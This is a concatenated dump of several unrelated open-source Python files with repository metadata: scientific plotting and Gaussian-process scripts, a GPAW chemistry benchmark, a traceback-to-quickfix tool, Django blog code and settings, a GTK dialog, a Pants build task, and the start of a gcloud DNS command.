if not is_sum:
df_res = pd.DataFrame(res.mean(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Averaged over {} experiments)>".format(
eval_metric,t_name, rep)
else:
df_res = pd.DataFrame(res.sum(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Total Sum over {} experiments)>".format(
eval_metric,t_name,rep)
print df_res
df_res.to_csv(fname)
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def plot_eval(eval_metric,res,etas,fig_name,
is_sum=False,weak='random',params=None,res_org=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
# cmap = plt.cm.get_cmap("jet", len(params)) -> cmap(i_p)
cmap = ['g','r','b','k','y','m','c']
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_{dist}'
t_name = weak + ' distance'
rep = res.shape[0]
if not is_sum:
res_plt = res.mean(axis=0)
res_org_plt = res_org.mean(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Averaged over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
label=r'SSAC(original) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
else:
res_plt = res.sum(axis=0)
res_org_plt = res_org.sum(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Total sum over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
label=r'SSAC(oroginal) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
if "accuracy" in eval_metric.lower():
plt.legend(loc=4)
min_val = min(res_plt.min(),res_org_plt.min())
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = min_val-(max_val-min_val)*0.55
ylim_max = max_val+(max_val-min_val)*0.05
elif ("error" in eval_metric.lower()) or ("fail" in eval_metric.lower()):
plt.legend(loc=1)
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = 0 - max_val*0.1
ylim_max = max_val*1.35
else:
plt.legend(loc=4)
plt.ylim([ylim_min,ylim_max])
plt.xlim([0,np.round(1.2*max(etas))])
f.savefig(fig_name,bbox_inches='tight')
def plot_hist(gammas,min_gamma,max_gamma,fig_name):
rep = len(gammas)
if rep>40:
n_bins = int(rep/20)
else:
n_bins = 10
f = plt.figure()
plt.hist(gammas,normed=False,bins=n_bins)
plt.title(r"Histogram of $\gamma$. min={}, max={} ({} generation)".format(min_gamma,max_gamma,rep))
plt.xlabel(r"$\gamma$")
plt.ylabel("Number of data generations")
f.savefig(fig_name,bbox_inches='tight')
def plot_cluster(X,y_true,y_pred,k,mpps,gamma,title,f_name,verbose,classes=None):
if classes is not None:
classes = classes
else:
classes = range(k+1)
cmap = plt.cm.get_cmap("jet", k+1)
if verbose:
print " ... Plotting"
f = plt.figure(figsize=(14,7))
plt.suptitle(title)
# Plot original clustering (k-means)
plt.subplot(121)
for i in xrange(1,k+1):
idx = y_true==i
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_true,label=classes)
plt.title("True dataset ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot SSAC result
plt.subplot(122)
for i in xrange(0,k+1):
idx = np.array(y_pred)==i
if sum(idx)>0:
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_pred,label=classes)
plt.title("SSAC result ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot estimated cluster centers
for t in xrange(k):
mpp = mpps[t]
plt.plot(mpp[0],mpp[1],'k^',ms=15,alpha=0.7)
f.savefig(f_name,bbox_inches='tight')
plt.close()
|
mit
| -8,352,230,938,918,783,000
| 33.456621
| 103
| 0.550225
| false
| 3.100247
| false
| false
| false
|
sparseMCMC/NIPS2015
|
experiments/spatial/spatial_demo.py
|
1
|
9549
|
import numpy as np
import GPy
from mcmcGP import BinnedPoisson, GPMCMC, SGPMCMC, HMC, AHMC
from itertools import product
from IPython import embed
from scipy.cluster.vq import kmeans
import pyhmc
def load_pines():
X = np.load('pines.np')
return X
def build_vb(initialZ, binMids, binSize, counts, seed):
np.random.seed(seed)
lik = BinnedPoisson(binSize)
kern = getKern(False)
return GPy.core.SVGP(X=binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def optimize_vb(m, max_iters=1000):
m.Z.fix()
m.kern.fix()
m.optimize('bfgs', max_iters=max_iters, messages=True)
m.Z.unfix()
m.kern.constrain_positive()
m.optimize('bfgs', max_iters=max_iters, messages=True)
return m
def get_samples_vb(m, num_samples):
mu, var = m._raw_predict(m.X)
samples = np.random.randn(mu.shape[0], num_samples)*np.sqrt(var) + mu
return samples
def get_samples_mc(m, samples, numsamples):
ms, vs = [],[]
for s in samples:
m.optimizer_array = s
mui, vi = m.predict_raw(m.X)
vi = np.clip(vi, 0, np.inf)
ms.append(mui); vs.append(vi)
samples = np.hstack([np.random.randn(mu.shape[0], numsamples)*np.sqrt(var) + mu for mu, var in zip(ms, vs)])
return samples
def get_samples_mc_full(m, samples):
Fs = []
for s in samples:
m.optimizer_array = s
Fs.append(m.F)
return np.hstack(Fs)
def getPriors():
return {'rbf_lengthscale': GPy.priors.Gamma(1.75,1.), 'rbf_variance': GPy.priors.Gamma(1.2, 1) }
def getKern(isBayesian):
kern = GPy.kern.RBF(2, lengthscale=1.)+GPy.kern.White(2, 1e-2)
priors = getPriors()
if isBayesian:
kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
kern.rbf.variance.set_prior(priors['rbf_variance'])
kern.white.variance.fix(1e-6)
return kern
def build_mc_sparse(initialZ, binMids, binSize, counts, seed):
kern = getKern(True)
lik = BinnedPoisson(binSize)
return SGPMCMC(binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def build_mc_exact( binMids, binSize, counts, seed):
kern = getKern(False)
lik = BinnedPoisson(binSize)
return GPMCMC( X = binMids, Y=counts.reshape(-1,1), kernel = kern, likelihood = lik )
def init_mc_model_from_vb(m_mcmc, m_vb):
#take the optimized vb model, and use it to init the mcmc mode
m_mcmc.kern[:] = m_vb.kern[:]
m_mcmc.Z[:] = m_vb.Z[:]
m_mcmc.Z.fix()
L = GPy.util.choleskies.flat_to_triang(m_vb.q_u_chol)[0,:,:]
u_sample = np.dot(L, np.random.randn(m_vb.num_inducing))
u_sample += m_vb.q_u_mean.flatten()
L = GPy.util.linalg.jitchol(m_mcmc.kern.K(m_mcmc.Z))
v_sample, _ = GPy.util.linalg.dtrtrs(L, u_sample)
m_mcmc.V[:] = v_sample.reshape(-1,1)
return m_mcmc
def init_exact_mc_model_from_vb( m_mcmc_exact, m_vb ):
#This should speed things up a bit.
m_mcmc_exact.kern[:] = m_vb.kern[:]
function_sample = get_samples_vb( m_vb, 1).flatten()
L = GPy.util.linalg.jitchol(m_mcmc_exact.kern.K(m_mcmc_exact.X))
v_sample , _ = GPy.util.linalg.dtrtrs(L, function_sample)
m_mcmc_exact.V[:] = v_sample.reshape(-1,1)
return m_mcmc_exact
def convertData(X, binsPerDimension):
Y = np.histogramdd( X, bins = (binsPerDimension,binsPerDimension), range = ( (0, 1.) , (0., 1.) ) )
return Y[0].reshape( Y[0].shape[0] * Y[0].shape[1] )
def getInitialInducingGrid( nInducingPoints ):
assert( np.sqrt( nInducingPoints ) == np.floor( np.sqrt( nInducingPoints ) ) ) # check nInducingPoints is a square number.
sqrtNInducingPoints = int( np.floor( np.sqrt( nInducingPoints ) ) )
return getGrid( sqrtNInducingPoints )[1]
def getGrid( nPointsPerDim ):
linearValues = np.linspace( 0., 1., nPointsPerDim+1 )
binEdges = np.array( [ np.array( elem ) for elem in product(linearValues,linearValues) ] )
offsetValues = linearValues[:-1] + 0.5*np.diff( linearValues )[0]
binMids = np.array( [ np.array( elem ) for elem in product(offsetValues,offsetValues) ] )
return binEdges*10., binMids*10.
def run_hmc(m, N, epsilon, Lmax):
def f(x):
return (-a for a in m._objective_grads(x))
samples, rate = HMC(f, N, Lmax=Lmax, epsilon=epsilon, x0=m.optimizer_array, verbose=True)
return samples
def priorSample():
binsPerDimension = 32
num_samples = 5
bin_edges, bin_mids = getGrid( binsPerDimension )
np.random.seed(1)
#There is almost certainly a better way to do this but tempus fugit.
priors = getPriors()
kern = getKern(True)
binArea = np.square( (bin_edges[0,1] - bin_edges[1,1] ) )
from matplotlib import pyplot as plt
for sampleIndex in range(num_samples):
print "\n sample index ", sampleIndex, "\n"
kern.rbf.lengthscale = priors['rbf_lengthscale'].rvs(1)
kern.rbf.variance = priors['rbf_variance'].rvs(1)
kern.bias.variance = priors['bias_variance'].rvs(1)
L = GPy.util.linalg.jitchol(kern.K(bin_mids))
functionSample = np.dot(L, np.random.randn( bin_mids.shape[0] ) )
intensities = np.exp( functionSample )
countSample = np.random.poisson( intensities * binArea )
print "Total counts ", np.sum( countSample )
squareIntensities = intensities.reshape( (binsPerDimension, binsPerDimension ))
squareCounts = countSample.reshape( (binsPerDimension, binsPerDimension ))
plt.figure()
plt.imshow( squareCounts, interpolation='nearest')
plt.title( "Prior sample "+ str(sampleIndex) )
plt.colorbar()
plt.figure()
plt.imshow( squareIntensities, interpolation='nearest')
plt.colorbar()
plt.title( "Prior sample "+ str(sampleIndex) )
class Experiment:
def __init__(self, seed, binsPerDimension , num_inducing, num_samples, vb_iterations, isExact=False):
self.seed, self.binsPerDimension, self.num_inducing, self.num_samples, self.isExact = seed, binsPerDimension, num_inducing, num_samples, isExact
np.random.seed(seed)
X = load_pines()
#will need to change bins to be two dimensional.
self.Y = convertData(X, binsPerDimension)
binEdges, bin_mids = getGrid( binsPerDimension )
initialZ = getInitialInducingGrid( num_inducing )
#setup and optimize VB model.
binArea = np.square( (binEdges[0,1] - binEdges[1,1] ) )
if not(isExact):
self.m_vb = build_vb(initialZ, bin_mids, binArea , self.Y, seed)
self.m_vb = optimize_vb(self.m_vb,vb_iterations)
self.fsamples_vb = get_samples_vb(self.m_vb, 1000)
self.m_mc = build_mc_sparse(initialZ, bin_mids, binArea, self.Y, seed)
self.m_mc = init_mc_model_from_vb(self.m_mc, self.m_vb)
self.samples = run_hmc(self.m_mc, num_samples, 0.125, Lmax = 20)
self.fsamples_mc = get_samples_mc(self.m_mc, self.samples[50::2], 10)
else:
priors = getPriors()
self.m_mc = build_mc_exact( bin_mids, binArea, self.Y, seed )
self.m_mc.kern.rbf.lengthscale.fix(1.)
self.m_mc.kern.rbf.variance.fix(1.)
self.m_mc.kern.white.variance.fix(1e-3)
self.m_mc.optimize('bfgs',messages=True,max_iters = 10000)
self.m_mc.kern.rbf.lengthscale.constrain_positive()
self.m_mc.kern.rbf.variance.constrain_positive()
self.m_mc.kern.white.variance.constrain_positive()
self.m_mc.kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
self.m_mc.kern.rbf.variance.set_prior(priors['rbf_variance'])
self.m_mc.kern.white.variance.fix(1e-3)
self.samples = run_hmc(self.m_mc, num_samples, epsilon=0.1 , Lmax = 20)
#priorSample()
if __name__ == "__main__":
num_samples = 2000
num_vb_iterations = [10000]
Ms = [225]
grids = [64]
#grids = [32]
seeds = [0]
isExact=False
experiments = [Experiment(seed, binsPerDimension=ng, num_inducing=M, num_samples=num_samples, vb_iterations=vb_iterations, isExact=isExact) for seed in seeds for ng in grids for M in Ms for vb_iterations in num_vb_iterations]
#from matplotlib import pyplot as plt
for e in experiments:
#plt.figure()
intensities = np.exp(e.fsamples_mc)*e.m_mc.likelihood.binsize
std = np.std(intensities, axis=1)
intensities = np.mean(intensities,axis=1)
squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensity')
np.savetxt( 'intensity_grid%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),intensities, delimiter=',')
np.savetxt( 'intensity_std%i_M%i_numsamp%i_exact%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples, e.isExact),std, delimiter=',')
#plt.figure()
#intensities = np.mean(np.exp(e.fsamples_vb)*e.m_mc.likelihood.binsize,axis=1)
#squareIntensities = intensities.reshape( (e.binsPerDimension , e.binsPerDimension ))
#plt.imshow( np.flipud(squareIntensities.T ), interpolation='nearest')
#plt.colorbar()
#plt.title( 'Mean posterior intensityi vb')
#np.savetxt( 'intensity_vb_grid%i_M%i_numsamp%i.csv'%(e.binsPerDimension, e.num_inducing, e.num_samples),intensities, delimiter=',')
|
gpl-2.0
| 6,435,820,772,835,654,000
| 41.066079
| 229
| 0.640591
| false
| 2.921971
| false
| false
| false
|
robwarm/gpaw-symm
|
gpaw/test/big/tpss/tpss.py
|
1
|
3276
|
from ase import Atoms
from ase.structure import molecule
from ase.parallel import paropen
from gpaw import GPAW, Mixer, MixerDif
from gpaw.utilities.tools import split_formula
cell = [14.4, 14.4, 14.4]
data = paropen('data.txt', 'a')
##Reference from J. Chem. Phys. Vol 120 No. 15, 15 April 2004, page 6898
tpss_de = [
('H2' , 112.9),
('LiH', 59.1),
('OH' , 106.8),
('HF' , 139.1),
('Li2', 22.5),
('LiF', 135.7),
('Be2', 8.1),
('CO' , 254.2),
('N2' , 227.7),
('O2' , 126.9),
('F2' , 46.4),
('P2' , 116.1),
('Cl2', 60.8)
]
exp_bonds_dE = [
('H2' , 0.741,109.5),
('LiH', 1.595,57.8),
('OH' , 0.970,106.4),
('HF' , 0.917,140.8),
('Li2', 2.673,24.4),
('LiF', 1.564,138.9),
('Be2', 2.440,3.0),
('CO' , 1.128,259.3),
('N2' , 1.098,228.5),
('O2' , 1.208,120.5),
('F2' , 1.412,38.5),
('P2' , 1.893,117.3),
('Cl2', 1.988,58.0)
]
systems = [ a[0] for a in tpss_de ]
ref = [ a[1] for a in tpss_de ]
# Add atoms
for formula in systems:
temp = split_formula(formula)
for atom in temp:
if atom not in systems:
systems.append(atom)
energies = {}
# Calculate energies
i = 0
for formula in systems:
if formula == 'Be2':
loa = Atoms('Be2', [(0, 0, 0), (0, 0, 2.0212)])
else:
loa = molecule(formula)
loa.set_cell(cell)
loa.center()
width = 0.0
calc = GPAW(h=.18,
nbands=-5,
maxiter=333,
xc='PBE',
txt=formula + '.txt')
if len(loa) == 1:
calc.set(hund=True)
calc.set(fixmom=True)
calc.set(mixer=MixerDif())
calc.set(eigensolver='cg')
else:
calc.set(mixer=Mixer())
pos = loa.get_positions()
pos[1,:] = pos[0,:] + [exp_bonds_dE[i][1],0.0,0.0]
loa.set_positions(pos)
loa.center()
loa.set_calculator(calc)
try:
energy = loa.get_potential_energy()
difft = calc.get_xc_difference('TPSS')
diffr = calc.get_xc_difference('revTPSS')
diffm = calc.get_xc_difference('M06L')
energies[formula]=(energy, energy+difft, energy+diffr,energy+diffm)
except:
print >>data, formula, 'Error'
else:
print >>data, formula, energy, energy+difft, energy+diffr, energy+diffm
data.flush()
i += 1
#calculate atomization energies
ii =0
file = paropen('atom_en.dat', 'a')
print >>file, "# formula \t PBE \t TPSS \t revTPSS \t M06L \t Exp"
for formula in systems[:13]:
try:
atoms_formula = split_formula(formula)
de_tpss = -1.0 * energies[formula][1]
de_revtpss = -1.0 * energies[formula][2]
de_m06l = -1.0 * energies[formula][3]
de_pbe = -1.0 * energies[formula][0]
for atom_formula in atoms_formula:
de_tpss += energies[atom_formula][1]
de_revtpss += energies[atom_formula][2]
de_m06l += energies[atom_formula][3]
de_pbe += energies[atom_formula][0]
except:
print >>file, formula, 'Error'
else:
de_tpss *= 627.5/27.211
de_revtpss *= 627.5/27.211
de_m06l *= 627.5/27.211
de_pbe *= 627.5/27.211
out = "%s\t%.1f \t%.1f \t%.1f \t%.1f \t%.1f" %(formula, de_pbe, de_tpss, de_revtpss, de_m06l ,exp_bonds_dE[ii][2])
print >>file, out
file.flush()
ii += 1
|
gpl-3.0
| -2,241,574,817,692,573,400
| 26.3
| 122
| 0.545482
| false
| 2.545455
| false
| false
| false
|
tonyxty/quickfix.py
|
src/quickfix_py/cli.py
|
1
|
4853
|
#!/usr/bin/env python3
"""Run a Python script and format the exception traceback as Vim quickfix.
quickfix.py
Copyright (C) 2015 Tony Beta Lambda <tonybetalambda@gmail.com>
This file is licensed under the MIT license. See LICENSE for more details.
"""
import os
import sys
import functools
import argparse
from runpy import run_path
from traceback import extract_tb
from contextlib import redirect_stdout
from quickfix_py import __version__
def run(filename, catch_interrupt=False):
exceptions = (
(Exception, KeyboardInterrupt) if catch_interrupt else Exception
)
try:
run_path(filename, run_name="__main__")
except exceptions:
_, e, tb = sys.exc_info()
return e, extract_tb(tb)[3:]
def extract_error_location(exc, filename_filter=None):
e, tb = exc
if isinstance(e, SyntaxError):
# yield the line triggering SyntaxError
yield (e.filename, e.lineno, "{}: {}".format(type(e).__name__, e.msg))
if tb is not None:
r = (
(filename, lineno, "in function " + fnname)
for filename, lineno, fnname, text in tb
if text is not None
)
if filename_filter is not None:
r = (_ for _ in r if filename_filter(_[0]))
r = list(r)
try:
filename, lineno, _ = r.pop()
except IndexError:
return
# insert error message to the first returned location
yield filename, lineno, "{}: {}".format(type(e).__name__, e)
yield from reversed(r)
# writable by user and directory components do not start with a dot
@functools.lru_cache(maxsize=32)
def is_user_heuristic(filename):
return os.access(filename, os.W_OK) and not any(
s != "." and s.startswith(".") for s in filename.split(os.sep)
)
def get_parser():
"""Defines options for quickfix.py."""
parser = argparse.ArgumentParser(
prog="quickfix.py",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description=(
"run a Python script and format the exception "
"traceback as Vim quickfix"
),
epilog="Fork me on GitHub: https://github.com/tonyxty/quickfix.py",
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="be more verbose"
)
parser.add_argument(
"-V",
"--version",
action="version",
version="%(prog)s {}".format(__version__),
)
parser.add_argument("-o", "--output", help="specify quickfix output file")
parser.add_argument(
"-i",
"--interrupt",
action="store_true",
help="catch ^C (useful when locating an infinite loop)",
)
parser.add_argument(
"-a",
"--all",
action="store_true",
help="print all files instead of just user files",
)
parser.add_argument(
"-f",
"--fuck",
action="store_true",
help=(
"print a line of command that opens $EDITOR / sensible-editor "
"at the last error location"
),
)
return parser
def main(args=None):
invocation = sys.argv[0]
parser = get_parser()
(options, args) = parser.parse_known_args(args)
if invocation == "thefuck.py":
options.fuck = True
sys.argv[:] = args
if len(args) > 0 and (args[0] == "python3" or args[0] == "python"):
filename_index = 1
else:
filename_index = 0
try:
filename = args[filename_index]
except IndexError:
if options.fuck:
print("#", end=" ")
print("no file given")
return 2
if options.output is not None:
exc = run(filename, options.interrupt)
else:
# suppress output of exec'ed script
with open(os.devnull, "w") as f:
with redirect_stdout(f):
exc = run(filename, options.interrupt)
if exc is not None:
filename_filter = None if options.all else is_user_heuristic
err_locs = extract_error_location(exc, filename_filter)
if options.output is not None:
outfile = open(options.output, "w")
else:
outfile = sys.stdout
if options.fuck:
try:
filename, lineno, _ = next(err_locs)
except StopIteration:
print("# no fuck given", file=outfile)
print(
os.getenv("EDITOR", "sensible-editor")
+ " {} +{}".format(filename, lineno),
file=outfile,
)
else:
print(
"\n".join('"{}":{}: {}'.format(*loc) for loc in err_locs),
file=outfile,
)
if outfile is not sys.stdout:
outfile.close()
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
mit
| -1,281,120,865,517,804,500
| 27.715976
| 78
| 0.564187
| false
| 4.010744
| false
| false
| false
|
jamessqr/james-squires-dotcom
|
blog/models.py
|
1
|
1065
|
from django.db import models
import datetime
class Category(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
slug = models.SlugField()
description = models.TextField()
class Meta:
ordering = ['title']
verbose_name_plural = "Categories"
class Admin:
pass
#TODO: This does not work!
#class CategoryAdmin(admin.ModelAdmin):
#prepopulated_fields = {"slug": ("title",)}
def __unicode__(self):
return self.title
def get_absolulte_url(self):
return "/categories/%s/" % self.slug
class Entry(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
excerpt = models.TextField(blank=True)
body = models.TextField()
slug = models.SlugField()
pub_date = models.DateTimeField(default=datetime.datetime.now)
class Meta:
ordering = ['title']
verbose_name_plural = "Entries"
class Admin:
pass
def __unicode__(self):
return self.title
def get_absolute_url(self):
return "/%s/%s" % (self.pub_date.strftime("%Y/%m/%d").lower(),self.slug)
|
bsd-3-clause
| -5,629,373,321,651,460,000
| 23.227273
| 77
| 0.694836
| false
| 3.237082
| false
| false
| false
|
daniel-e/papershelf
|
dialogs/settings.py
|
1
|
2638
|
import pygtk
pygtk.require('2.0')
import gtk
class DialogSettings(gtk.Dialog):
def __init__(self, title, parent, flag, settings):
gtk.Dialog.__init__(self, title, parent, flag)
s = settings
self.s = s
t = gtk.Table(rows = 3, columns = 3)
t.set_col_spacings(10)
t.set_row_spacings(10)
l = gtk.Label("PDF Viewer:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 0, 1)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfviewer"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 0, 1)
l.show()
self.pdf_viewer = l
l = gtk.Label("PDF Location:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 1, 2)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdflocation"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 1, 2)
l.show()
self.pdf_location = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_location, None)
t.attach(b, 2, 3, 1, 2)
# ----
l = gtk.Label("Preview converter:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 2, 3)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfconvert"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 2, 3)
l.show()
self.pdf_convert = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_convert, None)
t.attach(b, 2, 3, 2, 3)
# ----
self.vbox.pack_start(t)
t.show()
self.add_button("Ok", 1)
self.add_button("Cancel", 2)
def show(self):
if self.run() == 1:
s = self.s
s.vars["pdfviewer"] = self.pdf_viewer.get_text()
s.vars["pdflocation"] = self.pdf_location.get_text()
s.vars["pdfconvert"] = self.pdf_convert.get_text()
s.commit()
self.destroy()
def choose_pdf_location(self, widget, data = None):
f = gtk.FileChooserDialog("Select a directory", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_location.set_text(f.get_current_folder())
f.destroy()
def choose_pdf_convert(self, widget, data = None):
f = gtk.FileChooserDialog("Select an executable", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
#f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_convert.set_text(f.get_filename())
f.destroy()
|
gpl-2.0
| 9,119,678,909,674,186,000
| 26.768421
| 89
| 0.590978
| false
| 2.779768
| false
| false
| false
|
PAHB/SIgma-Nu-idea-1
|
Backend_stuff/sigma_nu/sigma_nu/settings.py
|
1
|
3345
|
"""
Django settings for sigma_nu project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd8&u=e=t2&3qdmj^eq*!+r^79sske#)2uul@4i98jhb)z*alsk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sigma_nu.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
'C:\Users\hightower\Desktop\Sigma Nu\SIgma-Nu-idea-1'
#need to update this when deployed
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sigma_nu.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
apache-2.0
| -8,023,671,557,027,920,000
| 25.76
| 91
| 0.686398
| false
| 3.484375
| false
| false
| false
|
lahosken/pants
|
src/python/pants/core_tasks/what_changed.py
|
1
|
2061
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.base.deprecated import deprecated
from pants.scm.subsystems.changed import Changed
from pants.task.console_task import ConsoleTask
# TODO: Remove this entire file in 1.5.0dev0.
class WhatChanged(ConsoleTask):
"""Emits the targets that have been modified since a given commit."""
@classmethod
def register_options(cls, register):
super(WhatChanged, cls).register_options(register)
# N.B. The bulk of options relevant to this task now come from the `Changed` subsystem.
register('--files', type=bool, removal_version='1.5.0dev0',
help='Show changed files instead of the targets that own them.',
removal_hint='Use your scm implementation (e.g. `git diff --stat`) instead.')
@classmethod
def subsystem_dependencies(cls):
return super(WhatChanged, cls).subsystem_dependencies() + (Changed.Factory,)
@deprecated('1.5.0dev0', 'Use e.g. `./pants --changed-parent=HEAD list` instead.',
'`./pants changed`')
def console_output(self, _):
# N.B. This task shares an options scope ('changed') with the `Changed` subsystem.
options = self.get_options()
changed = Changed.Factory.global_instance().create(options)
change_calculator = changed.change_calculator(
build_graph=self.context.build_graph,
address_mapper=self.context.address_mapper,
scm=self.context.scm,
workspace=self.context.workspace,
# N.B. `exclude_target_regexp` is a global scope option registered elsewhere.
exclude_target_regexp=options.exclude_target_regexp
)
if options.files:
for f in sorted(change_calculator.changed_files()):
yield f
else:
for addr in sorted(change_calculator.changed_target_addresses()):
yield addr.spec
|
apache-2.0
| -6,841,545,234,120,318,000
| 41.061224
| 93
| 0.700631
| false
| 3.955854
| false
| false
| false
|
flgiordano/netcash
|
+/google-cloud-sdk/lib/surface/dns/managed_zones/create.py
|
1
|
2431
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""gcloud dns managed-zone create command."""
from googlecloudsdk.api_lib.dns import util
from googlecloudsdk.calliope import base
from googlecloudsdk.core import list_printer
from googlecloudsdk.core import log
class Create(base.Command):
"""Create a Cloud DNS managed-zone.
This command creates a Cloud DNS managed-zone.
"""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': """\
To create a managed-zone, run:
